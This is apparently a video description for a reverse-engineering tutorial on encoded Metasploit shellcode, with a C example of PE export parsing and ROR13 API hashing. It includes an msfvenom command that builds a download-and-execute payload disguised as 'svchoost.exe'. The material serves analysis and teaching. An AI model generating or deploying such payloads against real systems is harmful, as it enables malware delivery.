In this video I show how to reverse encoded shellcode in IDA, with the help of a new feature of the tiny_tracer tool.
You can also see a technique that shellcode uses very often to resolve API function addresses: walking the TEB, the PEB, the loader's module list and the export directory structures, among others.
This covers: generating shellcode, converting the shellcode to an EXE, debugging in IDA, applying structures in IDA, using tiny_tracer, and the cports tool.
Generating the encoded shellcode:
msfvenom.bat -p windows/download_exec EXE="svchoost.exe" URL="http://localhost:8080/malware.exe" -e x86/xor_dynamic -o ./shellcode.sc
Loading the type library in IDA: ntapi_win7
Adding struct types: _TEB, _PEB, _PEB_LDR_DATA, LDR_DATA_TABLE_ENTRY, _IMAGE_DOS_HEADER, _IMAGE_NT_HEADERS32, _IMAGE_EXPORT_DIRECTORY
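To make the API-resolution walk concrete, here is an added example (written for this page; it is not code from the video, from Metasploit or from tiny_tracer) that does in C what the shellcode does by hand: it parses _IMAGE_DOS_HEADER -> _IMAGE_NT_HEADERS32 -> _IMAGE_EXPORT_DIRECTORY of a module and finds an export by the ROR13 hash that msfvenom's x86 payloads push before calling their resolver stub. The hash functions follow the block_api stub exactly (function name hashed as ASCII including the NUL; module name hashed as uppercased UTF-16 including its terminator), which is why the sums come out to the constants you see in the disassembly, such as 0x876F8B31 for kernel32.dll!WinExec and 0x0726774C for kernel32.dll!LoadLibraryA. The module image itself is constructed in memory (a fake "fake32.dll" with three exports at made-up RVAs 0x1000/0x2000/0x3000 and non-identity ordinals) so the code runs offline on any platform; on a real target the base would come from the TEB/PEB walk noted in the comments, which is Windows-only and not performed here.

```c
/* Added example: export-directory parsing + Metasploit-style ROR13 API hashing.
 * Not the video's or tiny_tracer's code. Host must be little-endian (PE is). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ROR13(x) ((uint32_t)(((x) >> 13) | ((x) << 19)))

/* block_api hashes an export name over its ASCII bytes INCLUDING the NUL. */
uint32_t hash_function_name(const char *name) {
    uint32_t h = 0;
    const unsigned char *p = (const unsigned char *)name;
    do { h = ROR13(h) + *p; } while (*p++);
    return h;
}

/* block_api hashes BaseDllName from the LDR entry: UTF-16, "uppercased" by
 * subtracting 0x20 from any byte >= 'a', over MaximumLength bytes, so the
 * 16-bit terminator is hashed too. For ASCII names each code unit is the
 * character byte followed by a zero byte (the zero byte only rotates). */
uint32_t hash_module_name(const char *name) {
    uint32_t h = 0;
    const unsigned char *p = (const unsigned char *)name;
    do {
        unsigned char c = *p;
        if (c >= 'a') c -= 0x20;
        h = ROR13(h) + c;   /* low byte of the UTF-16 unit */
        h = ROR13(h);       /* high byte, 0 for ASCII */
    } while (*p++);
    return h;
}

/* The constant a Metasploit payload pushes: module hash + function hash. */
uint32_t hash_api(const char *module, const char *function) {
    return hash_module_name(module) + hash_function_name(function);
}

/* Minimal PE structures; same layout as the Windows SDK structs applied in IDA. */
#pragma pack(push, 1)
typedef struct { uint16_t e_magic; uint8_t rest[58]; uint32_t e_lfanew; } DOS_HEADER;
typedef struct { uint32_t VirtualAddress, Size; } DATA_DIRECTORY;
typedef struct {
    uint32_t Signature;            /* "PE\0\0" */
    uint8_t  FileHeader[20];
    uint8_t  OptionalStd[96];      /* Magic .. NumberOfRvaAndSizes (PE32) */
    DATA_DIRECTORY DataDirectory[16];   /* [0] = export directory */
} NT_HEADERS32;
typedef struct {
    uint32_t Characteristics, TimeDateStamp;
    uint16_t MajorVersion, MinorVersion;
    uint32_t Name, Base, NumberOfFunctions, NumberOfNames;
    uint32_t AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals;
} EXPORT_DIRECTORY;
#pragma pack(pop)

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }

/* Returns the RVA of the export whose name hashes to `want`, or 0 if absent.
 * `base` is the mapped module base. x86 shellcode obtains it via
 * fs:[0x30] (PEB) -> +0x0C (Ldr) -> +0x14 (InMemoryOrderModuleList.Flink);
 * from that link, DllBase is at +0x10 and BaseDllName.Buffer at +0x28. */
uint32_t resolve_export_rva(const uint8_t *base, uint32_t want) {
    const DOS_HEADER *dos = (const DOS_HEADER *)base;
    if (dos->e_magic != 0x5A4D) return 0;                      /* "MZ" */
    const NT_HEADERS32 *nt = (const NT_HEADERS32 *)(base + dos->e_lfanew);
    if (nt->Signature != 0x00004550) return 0;                 /* "PE\0\0" */
    uint32_t exp_rva = nt->DataDirectory[0].VirtualAddress;
    if (exp_rva == 0) return 0;                                /* no exports */
    const EXPORT_DIRECTORY *ed = (const EXPORT_DIRECTORY *)(base + exp_rva);
    for (uint32_t i = 0; i < ed->NumberOfNames; i++) {
        const char *name = (const char *)(base + rd32(base + ed->AddressOfNames + 4 * i));
        if (hash_function_name(name) != want) continue;
        /* AddressOfNameOrdinals[i] indexes AddressOfFunctions, not the name table. */
        uint16_t ord = rd16(base + ed->AddressOfNameOrdinals + 2 * i);
        if (ord >= ed->NumberOfFunctions) return 0;
        return rd32(base + ed->AddressOfFunctions + 4 * ord);
    }
    return 0;
}

/* Constructed test module, laid out so RVA == file offset (no sections). */
static uint8_t image[0x400];
const uint8_t *build_fake_module(void) {
    memset(image, 0, sizeof image);
    DOS_HEADER *dos = (DOS_HEADER *)image;
    dos->e_magic = 0x5A4D; dos->e_lfanew = 0x40;
    NT_HEADERS32 *nt = (NT_HEADERS32 *)(image + 0x40);
    nt->Signature = 0x00004550;
    nt->DataDirectory[0].VirtualAddress = 0x200; nt->DataDirectory[0].Size = 0x200;
    EXPORT_DIRECTORY *ed = (EXPORT_DIRECTORY *)(image + 0x200);
    ed->Name = 0x2F0; ed->Base = 1; ed->NumberOfFunctions = 3; ed->NumberOfNames = 3;
    ed->AddressOfFunctions = 0x240; ed->AddressOfNames = 0x260; ed->AddressOfNameOrdinals = 0x280;
    strcpy((char *)image + 0x2F0, "fake32.dll");
    const uint32_t funcs[3] = { 0x1000, 0x2000, 0x3000 };      /* hypothetical RVAs */
    const char *names[3] = { "CreateProcessA", "LoadLibraryA", "WinExec" };
    const uint16_t ords[3] = { 2, 0, 1 };                       /* name i -> funcs[ords[i]] */
    for (int i = 0; i < 3; i++) {
        uint32_t name_rva = 0x300 + 0x10 * i;
        memcpy(image + 0x240 + 4 * i, &funcs[i], 4);
        memcpy(image + 0x260 + 4 * i, &name_rva, 4);
        memcpy(image + 0x280 + 2 * i, &ords[i], 2);
        strcpy((char *)image + name_rva, names[i]);
    }
    return image;
}

int main(void) {
    const uint8_t *mod = build_fake_module();
    printf("kernel32.dll!WinExec hash = 0x%08X\n", hash_api("kernel32.dll", "WinExec"));
    printf("WinExec RVA in fake module = 0x%X\n", resolve_export_rva(mod, hash_function_name("WinExec")));
    return 0;
}
```

When you hit the resolver loop in the debugger, compute hash_api for the module/function pair you suspect and compare it with the value pushed before the call; the ordinal indirection in resolve_export_rva is the same step you will see the shellcode do with the _IMAGE_EXPORT_DIRECTORY fields once the struct is applied in IDA.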
The samples are not malicious and are for educational purposes only; downloads here:
shellcode2exe – https://github.com/repnz/shellcode2exe
cports – https://www.nirsoft.net/utils/cports.html
PE-bear – https://github.com/hasherezade/pe-bear-releases
tiny_tracer – https://github.com/hasherezade/tiny_tracer
metasploit – https://www.metasploit.com/download
wireshark – https://www.wireshark.org/#download
procmon – https://docs.microsoft.com/en-us/sysinternals/downloads/procmon